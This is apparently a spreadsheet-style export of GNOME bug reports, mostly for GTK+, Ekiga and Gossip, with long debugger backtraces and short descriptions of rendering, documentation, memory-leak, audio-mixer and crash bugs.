	instbuf = Ã€DÂ¹\000\000\000\000\000\225ÃŽGÂ¨\021+\000\000\000\207\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000Ã€DÂ¹\000\000\000\000\000Ã£Ã‡Ã Â¨\021+ '\0'  \207\033\003Ã¿\177\000\000Â \005\235\000\000\000\000\000\225ÃŽGÂ¨\021+\000\000\000\207\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000Â \005\235\000\000\000\000\000\200Ã¦p\000\000\000\000\000p\206\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000\230Ã¦p\000\000\000\000\000Â \206\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000\t\214Ã‡Âª\021+\000\000Ã F\233\000\000\000\000\000\200Ã¦p\000\000\000\000\000p\206\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000p\206\033\003Ã¿\177\000\000w...
	ok = 12156288
	self = (PyObject *) 0x2b11a79a6fc8
	class = (PyObject *) 0x1
	result = 
#13 0x00002b11a7a413b0 in PyObject_Call (func=0x0 arg=0x0 kw=0x2b11a79a2084)
    at Objects/abstract.c:1795
	result = 
	call = (ternaryfunc) 0xb97d80
#14 0x00002b11a7a96a3c in PyEval_CallObjectWithKeywords (func=0x2aaaaf0021e0 
    arg=0x2b11a799b250 kw=0x0) at Python/ceval.c:3435
	result = 
#15 0x00002b11a8339265 in ?? ()
   from /usr/lib64/python2.4/site-packages/gtk-2.0/gobject/_gobject.so
No symbol table info available.
#16 0x00002b11a847b0c9 in IA__g_closure_invoke (closure=0xbb10e0 
    return_value=0x0 n_param_values=1 param_values=0x7fff031b8a20 
    invocation_hint=0x7fff031b88f0) at gclosure.c:490
	marshal = (GClosureMarshal) 0x2b11a8339170
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#17 0x00002b11a848ae81 in signal_emit_unlocked_R (node=0x999850 detail=0 
    instance=0x99e2d0 emission_return=0x0 
    instance_and_params=0x7fff031b8a20) at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0xbb08c0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x7fff031b8f50 instance = 0x99e2d0 ihint = {
    signal_id = 145 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x9997e0
	handler_list = (Handler *) 0xbb08c0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 145
	max_sequential_handler_number = 185
	return_value_altered = 1
#18 0x00002b11a848c135 in IA__g_signal_emit_valist (instance=0x99e2d0 
    signal_id= detail=0 var_args=0x7fff031b8ca0)
    at gsignal.c:2199
	_cvalue = 
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 32 v_long = 32 v_int64 = 32 
    v_double = 1.5810100666919889e-322 v_pointer = 0x20} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
    v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 7396416 data = {{v_int = 7399040 
      v_uint = 7399040 v_long = 7399040 v_ulong = 7399040 
      v_int64 = 7399040 v_uint64 = 7399040 v_float = 1.03682634e-38 
      v_double = 3.6556114762052168e-317 v_pointer = 0x70e680} {
      v_int = 7399040 v_uint = 7399040 v_long = 7399040 v_ulong = 7399040 
      v_int64 = 7399040 v_uint64 = 7399040 v_float = 1.03682634e-38 
      v_double = 3.6556114762052168e-317 v_pointer = 0x70e680}}}
	error = 
	instance_and_params = (GValue *) 0x7fff031b8a20
	stack_values = {{g_type = 6413520 data = {{v_int = 10085072 
        v_uint = 10085072 v_long = 10085072 v_ulong = 10085072 
        v_int64 = 10085072 v_uint64 = 10085072 v_float = 1.41321959e-38 
        v_double = 4.982687611035472e-317 v_pointer = 0x99e2d0} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 7399040 
    data = {{v_int = 16 v_uint = 16 v_long = 16 v_ulong = 16 
        v_int64 = 16 v_uint64 = 16 v_float = 2.24207754e-44 
        v_double = 7.9050503334599447e-323 v_pointer = 0x10} {
        v_int = 52136608 v_uint = 52136608 v_long = 140733245524640 
        v_ulong = 140733245524640 v_int64 = 140733245524640 
        v_uint64 = 140733245524640 v_float = 4.57095398e-37 
        v_double = 6.9531461841465981e-310 v_pointer = 0x7fff031b8aa0}}} {
    g_type = 7399064 data = {{v_int = 52137004 v_uint = 52137004 
        v_long = 140733245525036 v_ulong = 140733245525036 
        v_int64 = 140733245525036 v_uint64 = 140733245525036 
        v_float = 4.57113155e-37 v_double = 6.9531461841661631e-310 
        v_pointer = 0x7fff031b8c2c} {v_int = 52136992 v_uint = 52136992 
        v_long = 140733245525024 v_ulong = 140733245525024 
        v_int64 = 140733245525024 v_uint64 = 140733245525024 
        v_float = 4.57112617e-37 v_double = 6.9531461841655703e-310 
        v_pointer = 0x7fff031b8c20}}} {g_type = 47354879642617 data = {{
        v_int = 24 v_uint = 24 v_long = 17179869208 v_ulong = 17179869208 
        v_int64 = 17179869208 v_uint64 = 17179869208 
        v_float = 3.36311631e-44 v_double = 8.4879831757186648e-314 
        v_pointer = 0x400000018} {v_int = -1473369760 v_uint = 2821597536 
        v_long = 47354836035936 v_ulong = 47354836035936 
        v_int64 = 47354836035936 v_uint64 = 47354836035936 
        v_float = -9.66791209e-15 v_double = 2.3396397649801055e-310 
        v_pointer = 0x2b11a82e2960}}} {g_type = 16 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 32 
        v_uint = 32 v_long = 32 v_ulong = 32 v_int64 = 32 v_uint64 = 32 
        v_float = 4.48415509e-44 v_double = 1.5810100666919889e-322 
        v_pointer = 0x20}}} {g_type = 7399220 data = {{v_int = 992 
        v_uint = 992 v_long = 992 v_ulong = 992 v_int64 = 992 
        v_uint64 = 992 v_float = 1.39008808e-42 
        v_double = 4.9011312067451657e-321 v_pointer = 0x3e0} {
        v_int = -1475238643 v_uint = 2819728653 v_long = 47354834167053 
        v_ulong = 47354834167053 v_int64 = 47354834167053 
        v_uint64 = 47354834167053 v_float = -8.08490661e-15 
        v_double = 2.3396396726450169e-310 v_pointer = 0x2b11a811a50d}}} {
    g_type = 7399040 data = {{v_int = 10127504 v_uint = 10127504 
        v_long = 10127504 v_ulong = 10127504 v_int64 = 10127504 
        v_uint64 = 10127504 v_float = 1.41916558e-38 
        v_double = 5.0036518045198077e-317 v_pointer = 0x9a8890} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 47354879647898 data = {{v_int = 412156161 v_uint = 412156161 
        v_long = 412156161 v_ulong = 412156161 v_int64 = 412156161 
        v_uint64 = 412156161 v_float = 3.74826352e-24 
        v_double = 2.0363219987191379e-315 v_pointer = 0x18910101} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 0 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1} {
        v_int = 7399040 v_uint = 7399040 v_long = 7399040 
        v_ulong = 7399040 v_int64 = 7399040 v_uint64 = 7399040 
        v_float = 1.03682634e-38 v_double = 3.6556114762052168e-317 
        v_pointer = 0x70e680}}} {g_type = 140733245524768 data = {{
        v_int = 52136864 v_uint = 52136864 v_long = 140733245524896 
        v_ulong = 140733245524896 v_int64 = 140733245524896 
        v_uint64 = 140733245524896 v_float = 4.57106877e-37 
        v_double = 6.9531461841592462e-310 v_pointer = 0x7fff031b8ba0} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 0 data = {{v_int = -1429762424 v_uint = 2865204872 
        v_long = 47354879643272 v_ulong = 47354879643272 
        v_int64 = 47354879643272 v_uint64 = 47354879643272 
        v_float = -3.5448402e-13 v_double = 2.3396419194687679e-310 
        v_pointer = 0x2b11aac78e88} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 
        v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
        v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0x7fff031b8a38
	node = (SignalNode *) 0x999850
	i = 4
	n_params = 0
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#19 0x00002b11a848c313 in IA__g_signal_emit (instance=0x0 signal_id=0 
    detail=2811895940) at gsignal.c:2243
	var_args = {{gp_offset = 24 fp_offset = 48 
    overflow_arg_area = 0x7fff031b8d80 reg_save_area = 0x7fff031b8cc0}}
#20 0x00002b11a8f102ba in IA__gtk_widget_activate (widget=0x99e2d0)
    at gtkwidget.c:3946
	__PRETTY_FUNCTION__ = IA__gtk_widget_activate
#21 0x00002b11a8e1e5b0 in IA__gtk_menu_shell_activate_item (
    menu_shell=0x97c080 menu_item=0x99e2d0 
    force_deactivate=) at gtkmenushell.c:1024
	slist = 
	shells = 
	__PRETTY_FUNCTION__ = IA__gtk_menu_shell_activate_item
#22 0x00002b11a8e1fa60 in gtk_menu_shell_button_release (widget=0x97c080 
    event=0xbabaa0) at gtkmenushell.c:630
	menu_shell = (GtkMenuShell *) 0x0
	menu_item = (GtkWidget *) 0x99e2d0
	deactivate = 
	__PRETTY_FUNCTION__ = gtk_menu_shell_button_release
#23 0x00002b11a8e1280d in _gtk_marshal_BOOLEAN__BOXED (closure=0x95c660 
    return_value=0x7fff031b8fa0 n_param_values= 
    param_values=0x7fff031b9090 invocation_hint= 
    marshal_data=0x2b11a8e17f20) at gtkmarshalers.c:84
	data1 = (gpointer) 0x97c080
	data2 = (gpointer) 0x2b11a79a2084
	v_return = 
	__PRETTY_FUNCTION__ = _gtk_marshal_BOOLEAN__BOXED
#24 0x00002b11a847b0c9 in IA__g_closure_invoke (closure=0x95c660 
    return_value=0x7fff031b8fa0 n_param_values=2 
    param_values=0x7fff031b9090 invocation_hint=0x7fff031b8f60)
    at gclosure.c:490
	marshal = (GClosureMarshal) 0x2b11a8479860 
	marshal_data = (gpointer) 0x160
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#25 0x00002b11a848b01f in signal_emit_unlocked_R (node=0x95c6d0 detail=0 
    instance=0x97c080 emission_return=0x7fff031b92b0 
    instance_and_params=0x7fff031b9090) at gsignal.c:2478
	tmp = 
	handler = 
	accumulator = (SignalAccumulator *) 0x95c750
	emission = {next = 0x0 instance = 0x97c080 ihint = {signal_id = 58 
    detail = 0 run_type = G_SIGNAL_RUN_LAST} state = EMISSION_RUN 
  chain_type = 6369840}
	class_closure = (GClosure *) 0x95c660
	handler_list = (Handler *) 0x0
	return_accu = (GValue *) 0x7fff031b8fa0
	accu = {g_type = 20 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 58
	max_sequential_handler_number = 185
	return_value_altered = 0
#26 0x00002b11a848befe in IA__g_signal_emit_valist (instance=0x97c080 
    signal_id= detail=0 var_args=0x7fff031b9310)
    at gsignal.c:2209
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0}}}
	error = 
	instance_and_params = (GValue *) 0x7fff031b9090
	stack_values = {{g_type = 6369840 data = {{v_int = 9945216 
        v_uint = 9945216 v_long = 9945216 v_ulong = 9945216 
        v_int64 = 9945216 v_uint64 = 9945216 v_float = 1.39362159e-38 
        v_double = 4.9135895660706986e-317 v_pointer = 0x97c080} {
        v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 
        v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 6926880 data = {{v_int = 12237472 v_uint = 12237472 
        v_long = 12237472 v_ulong = 12237472 v_int64 = 12237472 
        v_uint64 = 12237472 v_float = 1.71483507e-38 
        v_double = 6.046114507144171e-317 v_pointer = 0xbabaa0} {
        v_int = 134217728 v_uint = 134217728 v_long = 134217728 
        v_ulong = 134217728 v_int64 = 134217728 v_uint64 = 134217728 
        v_float = 3.85185989e-34 v_double = 6.631236846766476e-316 
        v_pointer = 0x8000000}}} {g_type = 7450624 data = {{v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 12237472 
        v_uint = 12237472 v_long = 12237472 v_ulong = 12237472 
        v_int64 = 12237472 v_uint64 = 12237472 v_float = 1.71483507e-38 
        v_double = 6.046114507144171e-317 v_pointer = 0xbabaa0}}} {
    g_type = 47354851567409 data = {{v_int = 13080080 v_uint = 13080080 
        v_long = 13080080 v_ulong = 13080080 v_int64 = 13080080 
        v_uint64 = 13080080 v_float = 1.8329096e-38 
        v_double = 6.4624181728551721e-317 v_pointer = 0xc79610} {
        v_int = 52138928 v_uint = 52138928 v_long = 140733245526960 
        v_ulong = 140733245526960 v_int64 = 140733245526960 
        v_uint64 = 140733245526960 v_float = 4.5719943e-37 
        v_double = 6.9531461842612214e-310 v_pointer = 0x7fff031b93b0}}} {
    g_type = 56623937 data = {{v_int = -1457813076 v_uint = 2837154220 
        v_long = 47354851592620 v_ulong = 47354851592620 
        v_int64 = 47354851592620 v_uint64 = 47354851592620 
        v_float = -3.45363251e-14 v_double = 2.3396405335824183e-310 
        v_pointer = 0x2b11a91b89ac} {v_int = 52138512 v_uint = 52138512 
        v_long = 140733245526544 v_ulong = 140733245526544 
        v_int64 = 140733245526544 v_uint64 = 140733245526544 
        v_float = 4.57180776e-37 v_double = 6.9531461842406682e-310 
        v_pointer = 0x7fff031b9210}}} {g_type = 7399040 data = {{
        v_int = 7410832 v_uint = 7410832 v_long = 7410832 
        v_ulong = 7410832 v_int64 = 7410832 v_uint64 = 7410832 
        v_float = 1.03847875e-38 v_double = 3.6614374983009768e-317 
        v_pointer = 0x711490} {v_int = 7396416 v_uint = 7396416 
        v_long = 7396416 v_ulong = 7396416 v_int64 = 7396416 
        v_uint64 = 7396416 v_float = 1.03645864e-38 
        v_double = 3.6543150479505294e-317 v_pointer = 0x70dc40}}} {
    g_type = 1 data = {{v_int = -1428637429 v_uint = 2866329867 
        v_long = 47354880768267 v_ulong = 47354880768267 
        v_int64 = 47354880768267 v_uint64 = 47354880768267 
        v_float = -3.84977071e-13 v_double = 2.3396419750509061e-310 
        v_pointer = 0x2b11aad8b90b} {v_int = 7396416 v_uint = 7396416 
        v_long = 7396416 v_ulong = 7396416 v_int64 = 7396416 
        v_uint64 = 7396416 v_float = 1.03645864e-38 
        v_double = 3.6543150479505294e-317 v_pointer = 0x70dc40}}} {
    g_type = 47354860572835 data = {{v_int = 32 v_uint = 32 v_long = 32 
        v_ulong = 32 v_int64 = 32 v_uint64 = 32 v_float = 4.48415509e-44 
        v_double = 1.5810100666919889e-322 v_pointer = 0x20} {
        v_int = -1449007254 v_uint = 2845960042 v_long = 47354860398442 
        v_ulong = 47354860398442 v_int64 = 47354860398442 
        v_uint64 = 47354860398442 v_float = -7.18998022e-14 
        v_double = 2.3396409686478316e-310 v_pointer = 0x2b11a9a1e76a}}} {
    g_type = 6 data = {{v_int = 93 v_uint = 93 v_long = 93 v_ulong = 93 
        v_int64 = 93 v_uint64 = 93 v_float = 1.30320757e-43 
        v_double = 4.5948105063235929e-322 v_pointer = 0x5d} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {
    g_type = 140733245526464 data = {{v_int = 13079072 v_uint = 13079072 
        v_long = 13079072 v_ulong = 13079072 v_int64 = 13079072 
        v_uint64 = 13079072 v_float = 1.83276835e-38 
        v_double = 6.4619201546841641e-317 v_pointer = 0xc79220} {
        v_int = -1469066759 v_uint = 2825900537 v_long = 47354840338937 
        v_ulong = 47354840338937 v_int64 = 47354840338937 
        v_uint64 = 47354840338937 v_float = -1.33126957e-14 
        v_double = 2.3396399775766023e-310 v_pointer = 0x2b11a86fd1f9}}} {
    g_type = 13735456 data = {{v_int = -1469226035 v_uint = 2825741261 
        v_long = 47354840179661 v_ulong = 47354840179661 
        v_int64 = 47354840179661 v_uint64 = 47354840179661 
        v_float = -1.31777837e-14 v_double = 2.3396399697073223e-310 
        v_pointer = 0x2b11a86d63cd} {v_int = 12237472 v_uint = 12237472 
        v_long = 12237472 v_ulong = 12237472 v_int64 = 12237472 
        v_uint64 = 12237472 v_float = 1.71483507e-38 
        v_double = 6.046114507144171e-317 v_pointer = 0xbabaa0}}} {
    g_type = 13751776 data = {{v_int = 52138928 v_uint = 52138928 
        v_long = 140733245526960 v_ulong = 140733245526960 
        v_int64 = 140733245526960 v_uint64 = 140733245526960 
        v_float = 4.5719943e-37 v_double = 6.9531461842612214e-310 
        v_pointer = 0x7fff031b93b0} {v_int = 7463232 v_uint = 7463232 
        v_long = 7463232 v_ulong = 7463232 v_int64 = 7463232 
        v_uint64 = 7463232 v_float = 1.04582155e-38 
        v_double = 3.6873265381430581e-317 v_pointer = 0x71e140}}} {
    g_type = 140733245526960 data = {{v_int = 13080080 v_uint = 13080080 
        v_long = 13080080 v_ulong = 13080080 v_int64 = 13080080 
        v_uint64 = 13080080 v_float = 1.8329096e-38 
        v_double = 6.4624181728551721e-317 v_pointer = 0xc79610} {
        v_int = 13080080 v_uint = 13080080 v_long = 13080080 
        v_ulong = 13080080 v_int64 = 13080080 v_uint64 = 13080080 
        v_float = 1.8329096e-38 v_double = 6.4624181728551721e-317 
        v_pointer = 0xc79610}}} {g_type = 47354837716629 data = {{
        v_int = 13080080 v_uint = 13080080 v_long = 13080080 
        v_ulong = 13080080 v_int64 = 13080080 v_uint64 = 13080080 
        v_float = 1.8329096e-38 v_double = 6.4624181728551721e-317 
        v_pointer = 0xc79610} {v_int = 1 v_uint = 1 v_long = 1 
        v_ulong = 1 v_int64 = 1 v_uint64 = 1 v_float = 1.40129846e-45 
        v_double = 4.9406564584124654e-324 v_pointer = 0x1}}} {
    g_type = 56623937 data = {{v_int = -1457903534 v_uint = 2837063762 
        v_long = 47354851502162 v_ulong = 47354851502162 
        v_int64 = 47354851502162 v_uint64 = 47354851502162 
        v_float = -3.42298415e-14 v_double = 2.3396405291131993e-310 
        v_pointer = 0x2b11a91a2852} {v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
        v_pointer = 0x0}}} {g_type = 7399040 data = {{v_int = 7399040 
        v_uint = 7399040 v_long = 7399040 v_ulong = 7399040 
        v_int64 = 7399040 v_uint64 = 7399040 v_float = 1.03682634e-38 
        v_double = 3.6556114762052168e-317 v_pointer = 0x70e680} {
        v_int = 7399040 v_uint = 7399040 v_long = 7399040 
        v_ulong = 7399040 v_int64 = 7399040 v_uint64 = 7399040 
        v_float = 1.03682634e-38 v_double = 3.6556114762052168e-317 
        v_pointer = 0x70e680}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 20
	param_values = (GValue *) 0x7fff031b90a8
	node = (SignalNode *) 0x95c6d0
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#27 0x00002b11a848c313 in IA__g_signal_emit (instance=0x0 signal_id=0 
    detail=2811895940) at gsignal.c:2243
	var_args = {{gp_offset = 32 fp_offset = 48 
    overflow_arg_area = 0x7fff031b93f0 reg_save_area = 0x7fff031b9330}}
#28 0x00002b11a8f0c60e in gtk_widget_event_internal (widget=0x97c080 
    event=0xbabaa0) at gtkwidget.c:3915
	signal_num = 
	return_val = 0
#29 0x00002b11a8e0bdde in IA__gtk_propagate_event (widget=0x97c080 
    event=0xbabaa0) at gtkmain.c:2341
	tmp = (GtkWidget *) 0x97c080
	handled_event = 0
	__PRETTY_FUNCTION__ = IA__gtk_propagate_event
#30 0x00002b11a8e0ce47 in IA__gtk_main_do_event (event=0xbabaa0)
    at gtkmain.c:1575
	event_widget = (GtkWidget *) 0x99e2d0
	grab_widget = (GtkWidget *) 0x99e2d0
	window_group = (GtkWindowGroup *) 0xa11280
	next_event = 
	rewritten_event = (GdkEvent *) </t>
  </si>
  <si>
    <t>GTK+-74490</t>
  </si>
  <si>
    <t>GtkTreeSortable::sort_column_changed doesn't have a desription</t>
  </si>
  <si>
    <t>GtkTreeSortable::sort_column_changed is mentioned in docs for
gtk_tree_sortable_set_sort_column_id ().
But there is no further info about thsi signal (i.e. there is no entry in
'Signals' chapter of GtkTreeSortable docs)</t>
  </si>
  <si>
    <t>GTK+-172164</t>
  </si>
  <si>
    <t>Problem with selection in HEAD</t>
  </si>
  <si>
    <t>Please describe the problem:
When I select a block of text in testtext the text on the same line before or
after the selection appears grayed out. This does not happen on 2.6 so is
perhaps related to the Cairo changes.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>EKIGA-334455</t>
  </si>
  <si>
    <t>Looks up recipient SIP domain when outbound proxy enabled</t>
  </si>
  <si>
    <t>Please describe the problem:
Ekiga seems to look up the recipents SIP domain even when the outbound proxy is
enabled.
Steps to reproduce:
- Configure an outboundproxy.
- Dial foo@existing.domain --&gt; works - sent via outboundproxy
- Dial foo@non-existing.domain --&gt; Ekiga says Abnormal call termination and
doesn't send any SIP packets
Actual results:
Expected results:
Ekiga shouldn't check if the domain exists when an outbound proxy is enabled.
Some proxies may allow to dial internal domains which do not exist in the DNS.
Further Ekiga doesn't currently seem to support SRV lookups so some SIP
addresses aren't reachable although a SIP proxy might be able to resolve them.
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>NETWORKMANAGER-383122</t>
  </si>
  <si>
    <t>auth prompt leaks memory</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #383110 +++
by not unreffing its GnomeProgram instance.</t>
  </si>
  <si>
    <t>GTK+-157778</t>
  </si>
  <si>
    <t>statusbar resize grip overdrawn when other widgets are packed in the statusbar</t>
  </si>
  <si>
    <t>This bug is in continuation of bug 73359 (which was mainly about the label in
the statusbar so I'm opening this bug instead of reopening the old one).
The statusbar still has problems with drawing the resize grip when other
widgets (like a GtkProgressbar) are packed (pack_end) in the statusbar. I'm
attaching a testcase.
The problem is this: when adding both progressbar and a resize grip the
progressbar draws over the resize grip and the label is positioned wrongly
which you can see by toggling the resize grip on/off in the testcase: the extra
space makes the statusbar's _label_ shorter instead of shifting the extra packed
widget to the left.</t>
  </si>
  <si>
    <t>EVOLUTION-200489</t>
  </si>
  <si>
    <t>off_t is cast to guint32 multiple places in camel.</t>
  </si>
  <si>
    <t>off_t is cast to guint32 multiple places in camel.  If off_t is larger than
guint32 this could cause problems.</t>
  </si>
  <si>
    <t>EKIGA-332613</t>
  </si>
  <si>
    <t>audio mixer doesn't work</t>
  </si>
  <si>
    <t>Please describe the problem:
The audio mixer have hardcoded entry (PCM for output volume and ??? for MIC volume)
But some devices like headset doesn't have this entry and the mixer doesn't work.
For example my headset have :
Simple mixer control 'Mic'0
  Capabilities: pvolume pvolume-joined cvolume pswitch pswitch-joined cswitch
cswitch-joined
  Playback channels: Mono
  Capture channels: Mono
  Limits: Playback 0 - 464 Capture 0 - 13
  Mono: Playback 0 [0%] [off] Capture 13 [100%] [on]
Simple mixer control 'Speaker'0
  Capabilities: pvolume pswitch pswitch-joined
  Playback channels: Front Left - Front Right
  Limits: Playback 0 - 44
  Mono:
  Front Left: Playback 21 [48%] [on]
  Front Right: Playback 21 [48%] [on]
Steps to reproduce:
- Have a sound device with non-expected control
- call somebody
- goto in audio panel
- try to change input/ouput audio level with slider
Actual results:
nothing
Expected results:
the input/ouput audio volume changes
Does this happen every time?
for a device yes.
Other information:
A solution could be to make inactive the silder when the device doesn't have the
control expected by ekiga.
Another solution could be to let choose the control for the mixer (but some
devices doens't have any mixer).</t>
  </si>
  <si>
    <t>castet.matthieu</t>
  </si>
  <si>
    <t>GOSSIP-415081</t>
  </si>
  <si>
    <t>Crash when clicking Remove in favourite chatrooms window with nothing selected</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Room -&gt; Manage Favourite
Clicked Removed without selecting any room.
Distribution: Fedora Core release 6 (Zod)
Gnome Release: 2.16.3 2007-01-31 (Red Hat Inc)
BugBuddy Version: 2.16.0
System: Linux 2.6.19-1.2911.6.4.fc6xen #1 SMP Sat Feb 24 14:57:17 EST 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70101000
Selinux: No
Accessibility: Disabled
Memory status: size: 63709184 vsize: 0 resident: 63709184 share: 0 rss: 28565504 rss_rlim: 0
CPU usage: start_time: 1173123831 rtime: 0 utime: 243 stime: 0 cutime:209 cstime: 0 timeout: 34 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/gossip'
(no debugging symbols found)
Using host libthread_db library /lib/i686/nosegneg/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1208321168 (LWP 3018)]
(no debugging symbols found)
0x00b13402 in __kernel_vsyscall ()
#0  0x00b13402 in __kernel_vsyscall ()
#1  0x00464e23 in __waitpid_nocancel ()
   from /lib/i686/nosegneg/libpthread.so.0
#2  0x001bfcf6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x00946e75 in gtk_tree_model_get_valist ()
   from /usr/lib/libgtk-x11-2.0.so.0
#5  0x0094706d in gtk_tree_model_get () from /usr/lib/libgtk-x11-2.0.so.0
#6  0x08072c82 in gtk_notebook_next_page ()
#7  0x003b00f9 in g_cclosure_marshal_VOID__VOID ()
   from /lib/libgobject-2.0.so.0
#8  0x003a2d9b in g_closure_invoke () from /lib/libgobject-2.0.so.0
#9  0x003b3433 in g_signal_chain_from_overridden ()
   from /lib/libgobject-2.0.so.0
#10 0x003b4957 in g_signal_emit_valist () from /lib/libgobject-2.0.so.0
#11 0x003b4b19 in g_signal_emit () from /lib/libgobject-2.0.so.0
#12 0x0079ce13 in gtk_button_clicked () from /usr/lib/libgtk-x11-2.0.so.0
#13 0x0079ea5e in gtk_button_set_alignment ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0x003b00f9 in g_cclosure_marshal_VOID__VOID ()
   from /lib/libgobject-2.0.so.0
#15 0x003a1589 in g_value_set_static_boxed () from /lib/libgobject-2.0.so.0
